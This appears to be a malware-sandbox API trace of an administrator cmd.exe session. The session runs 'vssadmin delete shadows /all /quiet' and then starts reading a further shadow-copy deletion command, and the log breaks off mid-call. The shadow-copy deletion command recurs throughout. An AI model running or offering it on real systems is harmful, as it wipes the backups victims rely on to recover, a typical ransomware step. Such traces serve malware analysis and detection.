_wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0136.006] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0136.006] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0136.006] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0136.006] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0136.006] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0136.006] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0136.006] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0136.006] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0136.006] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0136.006] ??_V@YAXPEAX@Z () returned 0x1 [0136.006] GetProcessHeap () returned 0x27a547e0000 [0136.006] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xffde) returned 0x27a547e8c00 [0136.007] GetProcessHeap () returned 0x27a547e0000 [0136.007] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x5a) returned 0x27a547f8bf0 [0136.007] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0136.007] malloc (_Size=0xffce) returned 0x27a549e0820 [0136.007] ??_V@YAXPEAX@Z () returned 0x27a549e0820 [0136.008] GetProcessHeap () returned 0x27a547e0000 [0136.008] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x1ffac) returned 0x27a547f8c60 [0136.010] SetErrorMode (uMode=0x0) returned 0x0 [0136.010] SetErrorMode (uMode=0x1) returned 0x0 [0136.010] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x27a547f8c70, lpFilePart=0x8dc3d4ee60 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x8dc3d4ee60*="system32") returned 0x13 [0136.010] SetErrorMode (uMode=0x0) returned 0x1 [0136.010] GetProcessHeap () returned 0x27a547e0000 [0136.010] RtlReAllocateHeap (Heap=0x27a547e0000, Flags=0x0, Ptr=0x27a547f8c60, Size=0x4a) returned 0x27a547f8c60 [0136.010] GetProcessHeap () returned 0x27a547e0000 [0136.010] RtlSizeHeap (HeapHandle=0x27a547e0000, Flags=0x0, MemoryPointer=0x27a547f8c60) returned 0x4a [0136.010] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0136.010] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0136.010] GetProcessHeap () returned 0x27a547e0000 [0136.010] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x1b4) returned 0x27a547f8cc0 [0136.010] GetProcessHeap () returned 0x27a547e0000 [0136.010] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x358) returned 0x27a547f8e80 [0136.019] GetProcessHeap () returned 0x27a547e0000 [0136.019] RtlReAllocateHeap (Heap=0x27a547e0000, Flags=0x0, Ptr=0x27a547f8e80, Size=0x1b6) returned 0x27a547f8e80 [0136.019] GetProcessHeap () returned 0x27a547e0000 [0136.019] RtlSizeHeap (HeapHandle=0x27a547e0000, Flags=0x0, MemoryPointer=0x27a547f8e80) returned 0x1b6 [0136.019] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.019] GetProcessHeap () returned 0x27a547e0000 [0136.019] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xe8) returned 0x27a547f9050 [0136.020] GetProcessHeap () returned 0x27a547e0000 [0136.020] RtlReAllocateHeap (Heap=0x27a547e0000, Flags=0x0, Ptr=0x27a547f9050, Size=0x7e) returned 0x27a547f9050 [0136.020] GetProcessHeap () returned 0x27a547e0000 [0136.020] RtlSizeHeap (HeapHandle=0x27a547e0000, Flags=0x0, MemoryPointer=0x27a547f9050) returned 0x7e [0136.020] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.021] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x8dc3d4ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8dc3d4ebd0) returned 0x27a547f90e0 [0136.021] GetProcessHeap () returned 0x27a547e0000 [0136.021] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x0, Size=0x28) returned 0x27a547e6a70 [0136.021] FindClose (in: hFindFile=0x27a547f90e0 | out: hFindFile=0x27a547f90e0) returned 1 [0136.021] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x8dc3d4ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8dc3d4ebd0) returned 0xffffffffffffffff [0136.021] GetLastError () returned 0x2 [0136.021] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x8dc3d4ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8dc3d4ebd0) returned 0x27a547f90e0 [0136.021] GetProcessHeap () returned 0x27a547e0000 [0136.021] RtlReAllocateHeap (Heap=0x27a547e0000, Flags=0x0, Ptr=0x27a547e6a70, Size=0x8) returned 0x27a547e6a70 [0136.021] FindClose (in: hFindFile=0x27a547f90e0 | out: hFindFile=0x27a547f90e0) returned 1 [0136.021] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0136.021] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0136.021] ??_V@YAXPEAX@Z () returned 0x1 [0136.021] GetConsoleTitleW (in: lpConsoleTitle=0x8dc3d4f150, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0136.022] GetProcessHeap () returned 0x27a547e0000 [0136.022] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x21c) returned 0x27a547f90e0 [0136.022] GetConsoleTitleW (in: lpConsoleTitle=0x27a547f90f0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0136.037] GetProcessHeap () returned 0x27a547e0000 [0136.037] RtlReAllocateHeap (Heap=0x27a547e0000, Flags=0x0, Ptr=0x27a547f90e0, Size=0xc2) returned 0x27a547f90e0 [0136.037] GetProcessHeap () returned 0x27a547e0000 [0136.037] RtlSizeHeap (HeapHandle=0x27a547e0000, Flags=0x0, MemoryPointer=0x27a547f90e0) returned 0xc2 [0136.037] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0136.040] GetProcessHeap () returned 0x27a547e0000 [0136.040] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f90e0) returned 1 [0136.040] InitializeProcThreadAttributeList (in: lpAttributeList=0x8dc3d4f070, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x8dc3d4ef60 | out: lpAttributeList=0x8dc3d4f070, lpSize=0x8dc3d4ef60) returned 1 [0136.040] UpdateProcThreadAttribute (in: lpAttributeList=0x8dc3d4f070, dwFlags=0x0, Attribute=0x60001, lpValue=0x8dc3d4ef4c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x8dc3d4f070, lpPreviousValue=0x0) returned 1 [0136.040] GetStartupInfoW (in: lpStartupInfo=0x8dc3d4f000 | out: lpStartupInfo=0x8dc3d4f000*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254)) [0136.040] GetProcessHeap () returned 0x27a547e0000 [0136.040] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x20) returned 0x27a547e6ef0 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.041] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.041] GetProcessHeap () returned 0x27a547e0000 [0136.042] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e6ef0) returned 1 [0136.042] GetProcessHeap () returned 0x27a547e0000 [0136.042] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x12) returned 0x27a547e6ef0 [0136.042] _get_osfhandle (_FileHandle=1) returned 0x254 [0136.042] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0136.042] _get_osfhandle (_FileHandle=0) returned 0x248 [0136.042] SetConsoleMode (hConsoleHandle=0x248, dwMode=0x0) returned 0 [0136.042] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\WINDOWS\\system32", lpStartupInfo=0x8dc3d4ef90*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x8dc3d4ef68 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x8dc3d4ef68*(hProcess=0x98, hThread=0x94, dwProcessId=0xf8c, dwThreadId=0xf90)) returned 1 [0136.099] CloseHandle (hObject=0x94) returned 1 [0136.099] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0136.099] GetProcessHeap () returned 0x27a547e0000 [0136.099] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e5a10) returned 1 [0136.099] GetEnvironmentStringsW () returned 0x27a547e5a10* [0136.099] GetProcessHeap () returned 0x27a547e0000 [0136.099] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xac4) returned 0x27a547f94f0 [0136.099] FreeEnvironmentStringsA (penv="=") returned 1 [0136.099] LoadLibraryExW (lpLibFileName="NTDLL.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe6b580000 [0136.099] GetProcAddress (hModule=0x7ffe6b580000, lpProcName="NtQueryInformationProcess") returned 0x7ffe6b6256b0 [0136.099] NtQueryInformationProcess (in: ProcessHandle=0x98, ProcessInformationClass=0x0, ProcessInformation=0x8dc3d4e468, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x8dc3d4e468, ReturnLength=0x0) returned 0x0 [0136.099] ReadProcessMemory (in: hProcess=0x98, lpBaseAddress=0x70b118e000, lpBuffer=0x8dc3d4e4a0, nSize=0x7a0, lpNumberOfBytesRead=0x8dc3d4e460 | out: lpBuffer=0x8dc3d4e4a0*, lpNumberOfBytesRead=0x8dc3d4e460*=0x7a0) returned 1 [0136.100] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0136.899] GetExitCodeProcess (in: hProcess=0x98, lpExitCode=0x8dc3d4eee8 | out: lpExitCode=0x8dc3d4eee8*=0x2) returned 1 [0136.920] CloseHandle (hObject=0x98) returned 1 [0136.923] _vsnwprintf (in: _Buffer=0x8dc3d4f0b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x8dc3d4eef8 | out: _Buffer="00000002") returned 8 [0136.936] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0136.936] GetProcessHeap () returned 0x27a547e0000 [0136.936] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f94f0) returned 1 [0136.936] GetEnvironmentStringsW () returned 0x27a547faac0* [0136.936] GetProcessHeap () returned 0x27a547e0000 [0136.936] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xaea) returned 0x27a547fb5c0 [0136.936] FreeEnvironmentStringsA (penv="=") returned 1 [0136.937] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0136.937] GetProcessHeap () returned 0x27a547e0000 [0136.937] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547fb5c0) returned 1 [0136.937] GetEnvironmentStringsW () returned 0x27a547faac0* [0136.937] GetProcessHeap () returned 0x27a547e0000 [0136.937] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xaea) returned 0x27a547fb5c0 [0136.937] FreeEnvironmentStringsA (penv="=") returned 1 [0136.938] GetProcessHeap () returned 0x27a547e0000 [0136.938] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e6ef0) returned 1 [0136.938] DeleteProcThreadAttributeList (in: lpAttributeList=0x8dc3d4f070 | out: lpAttributeList=0x8dc3d4f070) [0136.938] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0136.963] ??_V@YAXPEAX@Z () returned 0x1 [0136.963] _get_osfhandle (_FileHandle=1) returned 0x254 [0136.964] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0136.966] _get_osfhandle (_FileHandle=1) returned 0x254 [0136.966] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff6de08fc08 | out: lpMode=0x7ff6de08fc08) returned 0 [0136.969] _get_osfhandle (_FileHandle=0) returned 0x248 [0136.969] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff6de08fc0c | out: lpMode=0x7ff6de08fc0c) returned 0 [0136.976] GetConsoleOutputCP () returned 0x1b5 [0136.980] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6de08fbb0 | out: lpCPInfo=0x7ff6de08fbb0) returned 1 [0136.980] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.016] GetProcessHeap () returned 0x27a547e0000 [0137.016] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f9050) returned 1 [0137.023] GetProcessHeap () returned 0x27a547e0000 [0137.023] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f8e80) returned 1 [0137.025] GetProcessHeap () returned 0x27a547e0000 [0137.025] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f8cc0) returned 1 [0137.025] GetProcessHeap () returned 0x27a547e0000 [0137.041] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f8c60) returned 1 [0137.041] GetProcessHeap () returned 0x27a547e0000 [0137.042] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f8bf0) returned 1 [0137.042] GetProcessHeap () returned 0x27a547e0000 [0137.042] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e8c00) returned 1 [0137.042] GetProcessHeap () returned 0x27a547e0000 [0137.042] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e8bb0) returned 1 [0137.042] GetProcessHeap () returned 0x27a547e0000 [0137.042] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e6c60) returned 1 [0137.043] GetProcessHeap () returned 0x27a547e0000 [0137.043] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e6e30) returned 1 [0137.043] _vsnwprintf (in: _Buffer=0x7ff6de097f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x8dc3d4f498 | out: _Buffer="\r\n") returned 2 [0137.043] _get_osfhandle (_FileHandle=1) returned 0x254 [0137.043] GetFileType (hFile=0x254) returned 0x3 [0137.043] _get_osfhandle (_FileHandle=1) returned 0x254 [0137.043] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0137.043] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x8dc3d4f468, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x8dc3d4f468*=0x2, lpOverlapped=0x0) returned 1 [0137.043] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0137.043] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x27a549b0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0137.043] _vsnwprintf (in: _Buffer=0x27a549c0060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x8dc3d4f4a8 | out: _Buffer="C:\\WINDOWS\\system32") returned 19 [0137.043] _vsnwprintf (in: _Buffer=0x27a549c0086, _BufferCount=0x83d2, _Format="%c", _ArgList=0x8dc3d4f4a8 | out: _Buffer=">") returned 1 [0137.043] _get_osfhandle (_FileHandle=1) returned 0x254 [0137.043] GetFileType (hFile=0x254) returned 0x3 [0137.043] _get_osfhandle (_FileHandle=1) returned 0x254 [0137.043] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\WINDOWS\\system32>", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\WINDOWS\\system32>", lpUsedDefaultChar=0x0) returned 21 [0137.043] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x8dc3d4f498, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x8dc3d4f498*=0x14, lpOverlapped=0x0) returned 1 [0137.043] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.043] GetFileType (hFile=0x248) returned 0x3 [0137.043] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.043] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.043] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.043] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c30, cchWideChar=1 | out: lpWideCharStr="wssadmin delete shadows /all /quiet\n") returned 1 [0137.043] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.044] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.044] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.044] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c32, cchWideChar=1 | out: lpWideCharStr="msadmin delete shadows /all /quiet\n") returned 1 [0137.044] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.044] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.044] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.044] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c34, cchWideChar=1 | out: lpWideCharStr="iadmin delete shadows /all /quiet\n") returned 1 [0137.044] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.044] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.044] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.044] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c36, cchWideChar=1 | out: lpWideCharStr="cdmin delete shadows /all /quiet\n") returned 1 [0137.044] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.044] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.044] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.044] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c38, cchWideChar=1 | out: lpWideCharStr=" min delete shadows /all /quiet\n") returned 1 [0137.044] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.044] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.044] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.044] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3a, cchWideChar=1 | out: lpWideCharStr="sin delete shadows /all /quiet\n") returned 1 [0137.044] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.044] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.044] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.044] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3c, cchWideChar=1 | out: lpWideCharStr="hn delete shadows /all /quiet\n") returned 1 [0137.044] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.044] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.044] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.045] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3e, cchWideChar=1 | out: lpWideCharStr="a delete shadows /all /quiet\n") returned 1 [0137.045] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.045] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, 